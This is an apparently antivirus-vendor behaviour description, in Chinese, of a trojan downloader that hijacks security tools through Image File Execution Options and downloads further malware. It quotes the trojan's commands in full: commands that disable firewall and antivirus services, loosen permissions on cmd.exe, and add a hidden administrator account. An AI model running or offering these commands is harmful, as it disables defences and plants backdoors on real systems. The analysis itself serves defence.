Win32.Troj.Downloader.vb.81920

  病毒名称(中文):
  肉鸡猎人81920
  病毒别名:
  
  
  威胁级别:
  ★★☆☆☆
  病毒类型:
  木马下载器
  病毒长度:
  81920
  影响系统:
  Win9xWinMeWinNTWin2000WinXPWin2003
  
  病毒行为:
  这是一个木马下载器病毒。病毒为了隐藏自己,所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外,还会严重破坏系统,关闭部分安全软件,映像劫持大量软件,并试图建立后门。
  1.释放病毒文件
  C:\Por.aed
  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\2PF3QNZE\CA05MZGT.htm
  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\C4DGV5NI\gx[1].jpg
  C:\DocumentsandSettings\fish\LocalSettings\TemporaryInternetFiles\Content.IE5\R146ZVU7\notepde[1].jpg
  C:\ProgramFiles\360safe\safemon\safemes.dll
  C:\WINDOWS\SoundMan.exe
  C:\WINDOWS\system32\interne.exe
  C:\WINDOWS\system32\Man.exe
  C:\WINDOWS\system32\no1.ini
  C:\WINDOWS\system32\note2.ini
  C:\WINDOWS\system32\notepde.exe
  C:\WINDOWS\system32\qoq.exe
  C:\WINDOWS\system32\ttjj5.ini
  2.创建服务并开启来加载文件,使其随系统启动
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoundManSoundMan.exe
  映像劫持大量程序,添加360Loader.exe360Safe.exe360tray.exeIceSwordIparmor.exekmailmon.exerasruniep
  镜象劫持为"Debugger"="svchost.exe"添加ctfmon.exe为"Debugger"="SoundMan.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Loader.exeDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360Safe.exeDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\360tray.exeDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ctfmon.exeDebugger"SoundMan.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSword
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\IceSwordDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\Iparmor.exeDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\kmailmon.exeDebugger"svchost.exe"
  .
  .
  .
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\ras
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\rasDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiep
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\runiepDebugger"svchost.exe"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exeDebugger"svchost.exe"
  修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL不显示隐藏文件
  删除安全软件的启动项
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunkavKavPFWvptrayruneipRavTaskRfwMain360Loader.exeras360Safe.exe360Safetray
  3.病毒生成文件中的网址由解密字符串得到
  CA05MZGT.htm
  gx[1].jpg
  notepde[1].jpg
  4.枚举进程判定当前进程里是否有"fint2005.exe""ehsniffer.exe""iris.exe"嗅探工具,不管有无都等待10分钟,连接网络
  InternetOpenUrlA读取InternetReadFilehttp://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg
  到c:\\windows\system32\vbb.exe运行
  "cacls.exeC:\WINDOWS\system32\cmd.exe/e/t/geveryone:F"给everyone用户组(就是所有人)对cmd.exe的完全控制,
  cmd.exe/cnetstopwscsvc&netstopsharedaccess&scconfigsharedaccessstart=disabled&scconfigwscsvc
  start=disabled&netstopKPfwSvc&netstopKWatchsvc&netstopMcShield&netstop"NortonAntiVirusServer"
  停止安全软件的服务。
  5.搜索进程中是否含有kmailmon.exekavstart.exeshstat.exeruniep.exeras.exeMPG4C32.exeimsins.exeIparmor.exe
  360safe.exe360tray.execacls.execcenter.exe用TerminateProcess来结束
  6."cmd.exe/cnetusernew112369/add&
  netusernew112369&
  netusernew1/active:yes&
  netlocalgroupadministrators/add
  添加一个new1治理员帐号密码12369,将这些信息写入%windir%\1.inf,然后调用rundll32.exe来修改HelpandSupport服务
  C:\WINDOWS\system32\interne.exe,并删除1.inf.关闭临时登陆用户new1
  "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1"添加建值为0,(1为开启)
  不能创建删除用户"cmd.exe/cnetusernew1/del"
  7.访问"http://webipcha.cn/ip/ip.asp"获取当前外网IP,"cmd/crouteprint|find"DefaultGateway:">c:\ip.txt"
  获取网关地址到c:\ip.txt,然后从文件重读出网关地址,删除文件。
  8.判定当前进程有没有avp.exe有了修改日期2001年7月15日
  9.释放扫描器qoq.exe(DotpotPortReadyVer1.6)到%windir%/system32/下,扫描网关上下C段的所有135端口开放的主机,
  记录到Por.aed,扫描外网C段上4个段位的ip,"cmd.exe/cmove"c:\Por.aed""%SystemRoot%\system32\Por.aed"&exit"
  10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址"cmd.exe/cstartC:\\popo.exeip&exit"
  (如cmd.exe/cstartC:\\popo.exe192.1**.18.15&exit通过POPO.EXE进行扫字典密码破解)
  11.扫描完毕删除qoq.exe,Por.aed,popo.exe